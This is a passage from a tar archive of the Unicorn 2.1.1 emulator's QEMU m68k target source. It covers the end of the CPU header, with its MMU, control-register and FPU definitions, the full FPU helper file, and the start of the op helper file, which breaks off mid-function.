M68K_DESC_SUPERONLY 0x00000080 #define M68K_DESC_USERATTR 0x00000300 #define M68K_DESC_USERATTR_SHIFT 8 #define M68K_DESC_GLOBAL 0x00000400 #define M68K_DESC_URESERVED 0x00000800 #define M68K_ROOT_POINTER_ENTRIES 128 #define M68K_4K_PAGE_MASK (~0xff) #define M68K_POINTER_BASE(entry) (entry & ~0x1ff) #define M68K_ROOT_INDEX(addr) ((address >> 23) & 0x1fc) #define M68K_POINTER_INDEX(addr) ((address >> 16) & 0x1fc) #define M68K_4K_PAGE_BASE(entry) (next & M68K_4K_PAGE_MASK) #define M68K_4K_PAGE_INDEX(addr) ((address >> 10) & 0xfc) #define M68K_8K_PAGE_MASK (~0x7f) #define M68K_8K_PAGE_BASE(entry) (next & M68K_8K_PAGE_MASK) #define M68K_8K_PAGE_INDEX(addr) ((address >> 11) & 0x7c) #define M68K_UDT_VALID(entry) (entry & 2) #define M68K_PDT_VALID(entry) (entry & 3) #define M68K_PDT_INDIRECT(entry) ((entry & 3) == 2) #define M68K_INDIRECT_POINTER(addr) (addr & ~3) #define M68K_TTS_POINTER_SHIFT 18 #define M68K_TTS_ROOT_SHIFT 25 /* bits for 68040 MMU Transparent Translation Registers */ #define M68K_TTR_ADDR_BASE 0xff000000 #define M68K_TTR_ADDR_MASK 0x00ff0000 #define M68K_TTR_ADDR_MASK_SHIFT 8 #define M68K_TTR_ENABLED 0x00008000 #define M68K_TTR_SFIELD 0x00006000 #define M68K_TTR_SFIELD_USER 0x0000 #define M68K_TTR_SFIELD_SUPER 0x2000 /* m68k Control Registers */ /* ColdFire */ /* Memory Management Control Registers */ #define M68K_CR_ASID 0x003 #define M68K_CR_ACR0 0x004 #define M68K_CR_ACR1 0x005 #define M68K_CR_ACR2 0x006 #define M68K_CR_ACR3 0x007 #define M68K_CR_MMUBAR 0x008 /* Processor Miscellaneous Registers */ #define M68K_CR_PC 0x80F /* Local Memory and Module Control Registers */ #define M68K_CR_ROMBAR0 0xC00 #define M68K_CR_ROMBAR1 0xC01 #define M68K_CR_RAMBAR0 0xC04 #define M68K_CR_RAMBAR1 0xC05 #define M68K_CR_MPCR 0xC0C #define M68K_CR_EDRAMBAR 0xC0D #define M68K_CR_SECMBAR 0xC0E #define M68K_CR_MBAR 0xC0F /* Local Memory Address Permutation Control Registers */ #define M68K_CR_PCR1U0 0xD02 #define M68K_CR_PCR1L0 0xD03 #define M68K_CR_PCR2U0 0xD04 #define M68K_CR_PCR2L0 0xD05 #define M68K_CR_PCR3U0 0xD06 #define M68K_CR_PCR3L0 0xD07 #define M68K_CR_PCR1U1 0xD0A #define M68K_CR_PCR1L1 0xD0B #define M68K_CR_PCR2U1 0xD0C #define M68K_CR_PCR2L1 0xD0D #define M68K_CR_PCR3U1 0xD0E #define M68K_CR_PCR3L1 0xD0F /* MC680x0 */ /* MC680[1234]0/CPU32 */ #define M68K_CR_SFC 0x000 #define M68K_CR_DFC 0x001 #define M68K_CR_USP 0x800 #define M68K_CR_VBR 0x801 /* + Coldfire */ /* MC680[234]0 */ #define M68K_CR_CACR 0x002 /* + Coldfire */ #define M68K_CR_CAAR 0x802 /* MC68020 and MC68030 only */ #define M68K_CR_MSP 0x803 #define M68K_CR_ISP 0x804 /* MC68040/MC68LC040 */ #define M68K_CR_TC 0x003 #define M68K_CR_ITT0 0x004 #define M68K_CR_ITT1 0x005 #define M68K_CR_DTT0 0x006 #define M68K_CR_DTT1 0x007 #define M68K_CR_MMUSR 0x805 #define M68K_CR_URP 0x806 #define M68K_CR_SRP 0x807 /* MC68EC040 */ #define M68K_CR_IACR0 0x004 #define M68K_CR_IACR1 0x005 #define M68K_CR_DACR0 0x006 #define M68K_CR_DACR1 0x007 #define M68K_FPIAR_SHIFT 0 #define M68K_FPIAR (1 << M68K_FPIAR_SHIFT) #define M68K_FPSR_SHIFT 1 #define M68K_FPSR (1 << M68K_FPSR_SHIFT) #define M68K_FPCR_SHIFT 2 #define M68K_FPCR (1 << M68K_FPCR_SHIFT) /* Floating-Point Status Register */ /* Condition Code */ #define FPSR_CC_MASK 0x0f000000 #define FPSR_CC_A 0x01000000 /* Not-A-Number */ #define FPSR_CC_I 0x02000000 /* Infinity */ #define FPSR_CC_Z 0x04000000 /* Zero */ #define FPSR_CC_N 0x08000000 /* Negative */ /* Quotient */ #define FPSR_QT_MASK 0x00ff0000 #define FPSR_QT_SHIFT 16 /* Floating-Point Control Register */ /* Rounding mode */ #define FPCR_RND_MASK 0x0030 #define FPCR_RND_N 0x0000 #define FPCR_RND_Z 0x0010 #define FPCR_RND_M 0x0020 #define FPCR_RND_P 0x0030 /* Rounding precision */ #define FPCR_PREC_MASK 0x00c0 #define FPCR_PREC_X 0x0000 #define FPCR_PREC_S 0x0040 #define FPCR_PREC_D 0x0080 #define FPCR_PREC_U 0x00c0 #define FPCR_EXCP_MASK 0xff00 /* CACR fields are implementation defined, but some bits are common. */ #define M68K_CACR_EUSP 0x10 #define MACSR_PAV0 0x100 #define MACSR_OMC 0x080 #define MACSR_SU 0x040 #define MACSR_FI 0x020 #define MACSR_RT 0x010 #define MACSR_N 0x008 #define MACSR_Z 0x004 #define MACSR_V 0x002 #define MACSR_EV 0x001 void m68k_set_irq_level(M68kCPU *cpu, int level, uint8_t vector); void m68k_switch_sp(CPUM68KState *env); void do_m68k_semihosting(CPUM68KState *env, int nr); /* * There are 4 ColdFire core ISA revisions: A, A+, B and C. * Each feature covers the subset of instructions common to the * ISA revisions mentioned. */ enum m68k_features { M68K_FEATURE_M68000, M68K_FEATURE_M68020, M68K_FEATURE_M68030, M68K_FEATURE_M68040, M68K_FEATURE_M68060, M68K_FEATURE_CF_ISA_A, M68K_FEATURE_CF_ISA_B, /* (ISA B or C). */ M68K_FEATURE_CF_ISA_APLUSC, /* BIT/BITREV, FF1, STRLDSR (ISA A+ or C). */ M68K_FEATURE_BRAL, /* Long unconditional branch. (ISA A+ or B). */ M68K_FEATURE_CF_FPU, M68K_FEATURE_CF_MAC, M68K_FEATURE_CF_EMAC, M68K_FEATURE_CF_EMAC_B, /* Revision B EMAC (dual accumulate). */ M68K_FEATURE_USP, /* User Stack Pointer. (ISA A+, B or C). */ M68K_FEATURE_EXT_FULL, /* 68020+ full extension word. */ M68K_FEATURE_WORD_INDEX, /* word sized address index registers. */ M68K_FEATURE_SCALED_INDEX, /* scaled address index registers. */ M68K_FEATURE_LONG_MULDIV, /* 32 bit multiply/divide. */ M68K_FEATURE_QUAD_MULDIV, /* 64 bit multiply/divide. */ M68K_FEATURE_BCCL, /* Long conditional branches. */ M68K_FEATURE_BITFIELD, /* Bit field insns. */ M68K_FEATURE_FPU, M68K_FEATURE_CAS, M68K_FEATURE_BKPT, M68K_FEATURE_RTD, M68K_FEATURE_CHK2, M68K_FEATURE_MOVEP, }; static inline int m68k_feature(CPUM68KState *env, int feature) { return (env->features & (1u << feature)) != 0; } void m68k_cpu_list(void); void register_m68k_insns (CPUM68KState *env); enum { /* 1 bit to define user level / supervisor access */ ACCESS_SUPER = 0x01, /* 1 bit to indicate direction */ ACCESS_STORE = 0x02, /* 1 bit to indicate debug access */ ACCESS_DEBUG = 0x04, /* PTEST instruction */ ACCESS_PTEST = 0x08, /* Type of instruction that generated the access */ ACCESS_CODE = 0x10, /* Code fetch access */ ACCESS_DATA = 0x20, /* Data load/store access */ }; #define cpu_signal_handler cpu_m68k_signal_handler #define cpu_list m68k_cpu_list /* MMU modes definitions */ #define MMU_KERNEL_IDX 0 #define MMU_USER_IDX 1 static inline int cpu_mmu_index (CPUM68KState *env, bool ifetch) { return (env->sr & SR_S) == 0 ? 1 : 0; } bool m68k_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); void m68k_cpu_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr); typedef CPUM68KState CPUArchState; typedef M68kCPU ArchCPU; #include "exec/cpu-all.h" /* TB flags */ #define TB_FLAGS_MACSR 0x0f #define TB_FLAGS_MSR_S_BIT 13 #define TB_FLAGS_MSR_S (1 << TB_FLAGS_MSR_S_BIT) #define TB_FLAGS_SFC_S_BIT 14 #define TB_FLAGS_SFC_S (1 << TB_FLAGS_SFC_S_BIT) #define TB_FLAGS_DFC_S_BIT 15 #define TB_FLAGS_DFC_S (1 << TB_FLAGS_DFC_S_BIT) static inline void cpu_get_tb_cpu_state(CPUM68KState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *pc = env->pc; *cs_base = 0; *flags = (env->macsr >> 4) & TB_FLAGS_MACSR; if (env->sr & SR_S) { *flags |= TB_FLAGS_MSR_S; *flags |= (env->sfc << (TB_FLAGS_SFC_S_BIT - 2)) & TB_FLAGS_SFC_S; *flags |= (env->dfc << (TB_FLAGS_DFC_S_BIT - 2)) & TB_FLAGS_DFC_S; } } // M68kCPU *cpu_m68k_init(struct uc_struct *uc, const char *cpu_model); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/fpu_helper.c���������������������������������������������������������0000664�0000000�0000000�00000044612�14675241067�0020532�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * m68k FPU helpers * * Copyright (c) 2006-2007 CodeSourcery * Written by Paul Brook * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "softfloat.h" /* * Undefined offsets may be different on various FPU. * On 68040 they return 0.0 (floatx80_zero) */ static const floatx80 fpu_rom[128] = { [0x00] = make_floatx80_init(0x4000, 0xc90fdaa22168c235ULL), /* Pi */ [0x0b] = make_floatx80_init(0x3ffd, 0x9a209a84fbcff798ULL), /* Log10(2) */ [0x0c] = make_floatx80_init(0x4000, 0xadf85458a2bb4a9aULL), /* e */ [0x0d] = make_floatx80_init(0x3fff, 0xb8aa3b295c17f0bcULL), /* Log2(e) */ [0x0e] = make_floatx80_init(0x3ffd, 0xde5bd8a937287195ULL), /* Log10(e) */ [0x0f] = make_floatx80_init(0x0000, 0x0000000000000000ULL), /* Zero */ [0x30] = make_floatx80_init(0x3ffe, 0xb17217f7d1cf79acULL), /* ln(2) */ [0x31] = make_floatx80_init(0x4000, 0x935d8dddaaa8ac17ULL), /* ln(10) */ [0x32] = make_floatx80_init(0x3fff, 0x8000000000000000ULL), /* 10^0 */ [0x33] = make_floatx80_init(0x4002, 0xa000000000000000ULL), /* 10^1 */ [0x34] = make_floatx80_init(0x4005, 0xc800000000000000ULL), /* 10^2 */ [0x35] = make_floatx80_init(0x400c, 0x9c40000000000000ULL), /* 10^4 */ [0x36] = make_floatx80_init(0x4019, 0xbebc200000000000ULL), /* 10^8 */ [0x37] = make_floatx80_init(0x4034, 0x8e1bc9bf04000000ULL), /* 10^16 */ [0x38] = make_floatx80_init(0x4069, 0x9dc5ada82b70b59eULL), /* 10^32 */ [0x39] = make_floatx80_init(0x40d3, 0xc2781f49ffcfa6d5ULL), /* 10^64 */ [0x3a] = make_floatx80_init(0x41a8, 0x93ba47c980e98ce0ULL), /* 10^128 */ [0x3b] = make_floatx80_init(0x4351, 0xaa7eebfb9df9de8eULL), /* 10^256 */ [0x3c] = make_floatx80_init(0x46a3, 0xe319a0aea60e91c7ULL), /* 10^512 */ [0x3d] = make_floatx80_init(0x4d48, 0xc976758681750c17ULL), /* 10^1024 */ [0x3e] = make_floatx80_init(0x5a92, 0x9e8b3b5dc53d5de5ULL), /* 10^2048 */ [0x3f] = make_floatx80_init(0x7525, 0xc46052028a20979bULL), /* 10^4096 */ }; int32_t HELPER(reds32)(CPUM68KState *env, FPReg *val) { return floatx80_to_int32(val->d, &env->fp_status); } float32 HELPER(redf32)(CPUM68KState *env, FPReg *val) { return floatx80_to_float32(val->d, &env->fp_status); } void HELPER(exts32)(CPUM68KState *env, FPReg *res, int32_t val) { res->d = int32_to_floatx80(val, &env->fp_status); } void HELPER(extf32)(CPUM68KState *env, FPReg *res, float32 val) { res->d = float32_to_floatx80(val, &env->fp_status); } void HELPER(extf64)(CPUM68KState *env, FPReg *res, float64 val) { res->d = float64_to_floatx80(val, &env->fp_status); } float64 HELPER(redf64)(CPUM68KState *env, FPReg *val) { return floatx80_to_float64(val->d, &env->fp_status); } void HELPER(firound)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_round_to_int(val->d, &env->fp_status); } static void m68k_restore_precision_mode(CPUM68KState *env) { switch (env->fpcr & FPCR_PREC_MASK) { case FPCR_PREC_X: /* extended */ set_floatx80_rounding_precision(80, &env->fp_status); break; case FPCR_PREC_S: /* single */ set_floatx80_rounding_precision(32, &env->fp_status); break; case FPCR_PREC_D: /* double */ set_floatx80_rounding_precision(64, &env->fp_status); break; case FPCR_PREC_U: /* undefined */ default: break; } } static void cf_restore_precision_mode(CPUM68KState *env) { if (env->fpcr & FPCR_PREC_S) { /* single */ set_floatx80_rounding_precision(32, &env->fp_status); } else { /* double */ set_floatx80_rounding_precision(64, &env->fp_status); } } static void restore_rounding_mode(CPUM68KState *env) { switch (env->fpcr & FPCR_RND_MASK) { case FPCR_RND_N: /* round to nearest */ set_float_rounding_mode(float_round_nearest_even, &env->fp_status); break; case FPCR_RND_Z: /* round to zero */ set_float_rounding_mode(float_round_to_zero, &env->fp_status); break; case FPCR_RND_M: /* round toward minus infinity */ set_float_rounding_mode(float_round_down, &env->fp_status); break; case FPCR_RND_P: /* round toward positive infinity */ set_float_rounding_mode(float_round_up, &env->fp_status); break; } } void cpu_m68k_set_fpcr(CPUM68KState *env, uint32_t val) { env->fpcr = val & 0xffff; if (m68k_feature(env, M68K_FEATURE_CF_FPU)) { cf_restore_precision_mode(env); } else { m68k_restore_precision_mode(env); } restore_rounding_mode(env); } void HELPER(fitrunc)(CPUM68KState *env, FPReg *res, FPReg *val) { int rounding_mode = get_float_rounding_mode(&env->fp_status); set_float_rounding_mode(float_round_to_zero, &env->fp_status); res->d = floatx80_round_to_int(val->d, &env->fp_status); set_float_rounding_mode(rounding_mode, &env->fp_status); } void HELPER(set_fpcr)(CPUM68KState *env, uint32_t val) { cpu_m68k_set_fpcr(env, val); } #define PREC_BEGIN(prec) \ do { \ int old; \ old = get_floatx80_rounding_precision(&env->fp_status); \ set_floatx80_rounding_precision(prec, &env->fp_status) \ #define PREC_END() \ set_floatx80_rounding_precision(old, &env->fp_status); \ } while (0) void HELPER(fsround)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(32); res->d = floatx80_round(val->d, &env->fp_status); PREC_END(); } void HELPER(fdround)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(64); res->d = floatx80_round(val->d, &env->fp_status); PREC_END(); } void HELPER(fsqrt)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_sqrt(val->d, &env->fp_status); } void HELPER(fssqrt)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(32); res->d = floatx80_sqrt(val->d, &env->fp_status); PREC_END(); } void HELPER(fdsqrt)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(64); res->d = floatx80_sqrt(val->d, &env->fp_status); PREC_END(); } void HELPER(fabs)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_round(floatx80_abs(val->d), &env->fp_status); } void HELPER(fsabs)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(32); res->d = floatx80_round(floatx80_abs(val->d), &env->fp_status); PREC_END(); } void HELPER(fdabs)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(64); res->d = floatx80_round(floatx80_abs(val->d), &env->fp_status); PREC_END(); } void HELPER(fneg)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_round(floatx80_chs(val->d), &env->fp_status); } void HELPER(fsneg)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(32); res->d = floatx80_round(floatx80_chs(val->d), &env->fp_status); PREC_END(); } void HELPER(fdneg)(CPUM68KState *env, FPReg *res, FPReg *val) { PREC_BEGIN(64); res->d = floatx80_round(floatx80_chs(val->d), &env->fp_status); PREC_END(); } void HELPER(fadd)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_add(val0->d, val1->d, &env->fp_status); } void HELPER(fsadd)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(32); res->d = floatx80_add(val0->d, val1->d, &env->fp_status); PREC_END(); } void HELPER(fdadd)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(64); res->d = floatx80_add(val0->d, val1->d, &env->fp_status); PREC_END(); } void HELPER(fsub)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_sub(val1->d, val0->d, &env->fp_status); } void HELPER(fssub)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(32); res->d = floatx80_sub(val1->d, val0->d, &env->fp_status); PREC_END(); } void HELPER(fdsub)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(64); res->d = floatx80_sub(val1->d, val0->d, &env->fp_status); PREC_END(); } void HELPER(fmul)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_mul(val0->d, val1->d, &env->fp_status); } void HELPER(fsmul)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(32); res->d = floatx80_mul(val0->d, val1->d, &env->fp_status); PREC_END(); } void HELPER(fdmul)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(64); res->d = floatx80_mul(val0->d, val1->d, &env->fp_status); PREC_END(); } void HELPER(fsglmul)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { int rounding_mode = get_float_rounding_mode(&env->fp_status); floatx80 a, b; PREC_BEGIN(32); set_float_rounding_mode(float_round_to_zero, &env->fp_status); a = floatx80_round(val0->d, &env->fp_status); b = floatx80_round(val1->d, &env->fp_status); set_float_rounding_mode(rounding_mode, &env->fp_status); res->d = floatx80_mul(a, b, &env->fp_status); PREC_END(); } void HELPER(fdiv)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_div(val1->d, val0->d, &env->fp_status); } void HELPER(fsdiv)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(32); res->d = floatx80_div(val1->d, val0->d, &env->fp_status); PREC_END(); } void HELPER(fddiv)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { PREC_BEGIN(64); res->d = floatx80_div(val1->d, val0->d, &env->fp_status); PREC_END(); } void HELPER(fsgldiv)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { int rounding_mode = get_float_rounding_mode(&env->fp_status); floatx80 a, b; PREC_BEGIN(32); set_float_rounding_mode(float_round_to_zero, &env->fp_status); a = floatx80_round(val1->d, &env->fp_status); b = floatx80_round(val0->d, &env->fp_status); set_float_rounding_mode(rounding_mode, &env->fp_status); res->d = floatx80_div(a, b, &env->fp_status); PREC_END(); } static int float_comp_to_cc(int float_compare) { switch (float_compare) { case float_relation_equal: return FPSR_CC_Z; case float_relation_less: return FPSR_CC_N; case float_relation_unordered: return FPSR_CC_A; case float_relation_greater: return 0; default: // g_assert_not_reached(); return 0; } } void HELPER(fcmp)(CPUM68KState *env, FPReg *val0, FPReg *val1) { int float_compare; float_compare = floatx80_compare(val1->d, val0->d, &env->fp_status); env->fpsr = (env->fpsr & ~FPSR_CC_MASK) | float_comp_to_cc(float_compare); } void HELPER(ftst)(CPUM68KState *env, FPReg *val) { uint32_t cc = 0; if (floatx80_is_neg(val->d)) { cc |= FPSR_CC_N; } if (floatx80_is_any_nan(val->d)) { cc |= FPSR_CC_A; } else if (floatx80_is_infinity(val->d)) { cc |= FPSR_CC_I; } else if (floatx80_is_zero(val->d)) { cc |= FPSR_CC_Z; } env->fpsr = (env->fpsr & ~FPSR_CC_MASK) | cc; } void HELPER(fconst)(CPUM68KState *env, FPReg *val, uint32_t offset) { val->d = fpu_rom[offset]; } typedef int (*float_access)(CPUM68KState *env, uint32_t addr, FPReg *fp, uintptr_t ra); static uint32_t fmovem_predec(CPUM68KState *env, uint32_t addr, uint32_t mask, float_access access_fn) { uintptr_t ra = GETPC(); int i, size; for (i = 7; i >= 0; i--, mask <<= 1) { if (mask & 0x80) { size = access_fn(env, addr, &env->fregs[i], ra); if ((mask & 0xff) != 0x80) { addr -= size; } } } return addr; } static uint32_t fmovem_postinc(CPUM68KState *env, uint32_t addr, uint32_t mask, float_access access_fn) { uintptr_t ra = GETPC(); int i, size; for (i = 0; i < 8; i++, mask <<= 1) { if (mask & 0x80) { size = access_fn(env, addr, &env->fregs[i], ra); addr += size; } } return addr; } static int cpu_ld_floatx80_ra(CPUM68KState *env, uint32_t addr, FPReg *fp, uintptr_t ra) { uint32_t high; uint64_t low; high = cpu_ldl_data_ra(env, addr, ra); low = cpu_ldq_data_ra(env, addr + 4, ra); fp->l.upper = high >> 16; fp->l.lower = low; return 12; } static int cpu_st_floatx80_ra(CPUM68KState *env, uint32_t addr, FPReg *fp, uintptr_t ra) { cpu_stl_data_ra(env, addr, fp->l.upper << 16, ra); cpu_stq_data_ra(env, addr + 4, fp->l.lower, ra); return 12; } static int cpu_ld_float64_ra(CPUM68KState *env, uint32_t addr, FPReg *fp, uintptr_t ra) { uint64_t val; val = cpu_ldq_data_ra(env, addr, ra); fp->d = float64_to_floatx80(*(float64 *)&val, &env->fp_status); return 8; } static int cpu_st_float64_ra(CPUM68KState *env, uint32_t addr, FPReg *fp, uintptr_t ra) { float64 val; val = floatx80_to_float64(fp->d, &env->fp_status); cpu_stq_data_ra(env, addr, *(uint64_t *)&val, ra); return 8; } uint32_t HELPER(fmovemx_st_predec)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_predec(env, addr, mask, cpu_st_floatx80_ra); } uint32_t HELPER(fmovemx_st_postinc)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_postinc(env, addr, mask, cpu_st_floatx80_ra); } uint32_t HELPER(fmovemx_ld_postinc)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_postinc(env, addr, mask, cpu_ld_floatx80_ra); } uint32_t HELPER(fmovemd_st_predec)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_predec(env, addr, mask, cpu_st_float64_ra); } uint32_t HELPER(fmovemd_st_postinc)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_postinc(env, addr, mask, cpu_st_float64_ra); } uint32_t HELPER(fmovemd_ld_postinc)(CPUM68KState *env, uint32_t addr, uint32_t mask) { return fmovem_postinc(env, addr, mask, cpu_ld_float64_ra); } static void make_quotient(CPUM68KState *env, floatx80 val) { int32_t quotient; int sign; if (floatx80_is_any_nan(val)) { return; } quotient = floatx80_to_int32(val, &env->fp_status); sign = quotient < 0; if (sign) { quotient = -quotient; } quotient = (sign << 7) | (quotient & 0x7f); env->fpsr = (env->fpsr & ~FPSR_QT_MASK) | (quotient << FPSR_QT_SHIFT); } void HELPER(fmod)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_mod(val1->d, val0->d, &env->fp_status); make_quotient(env, res->d); } void HELPER(frem)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_rem(val1->d, val0->d, &env->fp_status); make_quotient(env, res->d); } void HELPER(fgetexp)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_getexp(val->d, &env->fp_status); } void HELPER(fgetman)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_getman(val->d, &env->fp_status); } void HELPER(fscale)(CPUM68KState *env, FPReg *res, FPReg *val0, FPReg *val1) { res->d = floatx80_scale(val1->d, val0->d, &env->fp_status); } void HELPER(flognp1)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_lognp1(val->d, &env->fp_status); } void HELPER(flogn)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_logn(val->d, &env->fp_status); } void HELPER(flog10)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_log10(val->d, &env->fp_status); } void HELPER(flog2)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_log2(val->d, &env->fp_status); } void HELPER(fetox)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_etox(val->d, &env->fp_status); } void HELPER(ftwotox)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_twotox(val->d, &env->fp_status); } void HELPER(ftentox)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_tentox(val->d, &env->fp_status); } void HELPER(ftan)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_tan(val->d, &env->fp_status); } void HELPER(fsin)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_sin(val->d, &env->fp_status); } void HELPER(fcos)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_cos(val->d, &env->fp_status); } void HELPER(fsincos)(CPUM68KState *env, FPReg *res0, FPReg *res1, FPReg *val) { floatx80 a = val->d; /* * If res0 and res1 specify the same floating-point data register, * the sine result is stored in the register, and the cosine * result is discarded. */ res1->d = floatx80_cos(a, &env->fp_status); res0->d = floatx80_sin(a, &env->fp_status); } void HELPER(fatan)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_atan(val->d, &env->fp_status); } void HELPER(fasin)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_asin(val->d, &env->fp_status); } void HELPER(facos)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_acos(val->d, &env->fp_status); } void HELPER(fatanh)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_atanh(val->d, &env->fp_status); } void HELPER(ftanh)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_tanh(val->d, &env->fp_status); } void HELPER(fsinh)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_sinh(val->d, &env->fp_status); } void HELPER(fcosh)(CPUM68KState *env, FPReg *res, FPReg *val) { res->d = floatx80_cosh(val->d, &env->fp_status); } ����������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/helper.c�������������������������������������������������������������0000664�0000000�0000000�00000073023�14675241067�0017656�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * m68k op helpers * * Copyright (c) 2006-2007 CodeSourcery * Written by Paul Brook * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" #define SIGNBIT (1u << 31) void HELPER(cf_movec_to)(CPUM68KState *env, uint32_t reg, uint32_t val) { switch (reg) { case M68K_CR_CACR: env->cacr = val; m68k_switch_sp(env); break; case M68K_CR_ACR0: case M68K_CR_ACR1: case M68K_CR_ACR2: case M68K_CR_ACR3: /* TODO: Implement Access Control Registers. */ break; case M68K_CR_VBR: env->vbr = val; break; /* TODO: Implement control registers. */ default: cpu_abort(env_cpu(env), "Unimplemented control register write 0x%x = 0x%x\n", reg, val); } } void HELPER(m68k_movec_to)(CPUM68KState *env, uint32_t reg, uint32_t val) { switch (reg) { /* MC680[1234]0 */ case M68K_CR_SFC: env->sfc = val & 7; return; case M68K_CR_DFC: env->dfc = val & 7; return; case M68K_CR_VBR: env->vbr = val; return; /* MC680[2346]0 */ case M68K_CR_CACR: if (m68k_feature(env, M68K_FEATURE_M68020)) { env->cacr = val & 0x0000000f; } else if (m68k_feature(env, M68K_FEATURE_M68030)) { env->cacr = val & 0x00003f1f; } else if (m68k_feature(env, M68K_FEATURE_M68040)) { env->cacr = val & 0x80008000; } else if (m68k_feature(env, M68K_FEATURE_M68060)) { env->cacr = val & 0xf8e0e000; } m68k_switch_sp(env); return; /* MC680[34]0 */ case M68K_CR_TC: env->mmu.tcr = val; return; case M68K_CR_MMUSR: env->mmu.mmusr = val; return; case M68K_CR_SRP: env->mmu.srp = val; return; case M68K_CR_URP: env->mmu.urp = val; return; case M68K_CR_USP: env->sp[M68K_USP] = val; return; case M68K_CR_MSP: env->sp[M68K_SSP] = val; return; case M68K_CR_ISP: env->sp[M68K_ISP] = val; return; /* MC68040/MC68LC040 */ case M68K_CR_ITT0: env->mmu.ttr[M68K_ITTR0] = val; return; case 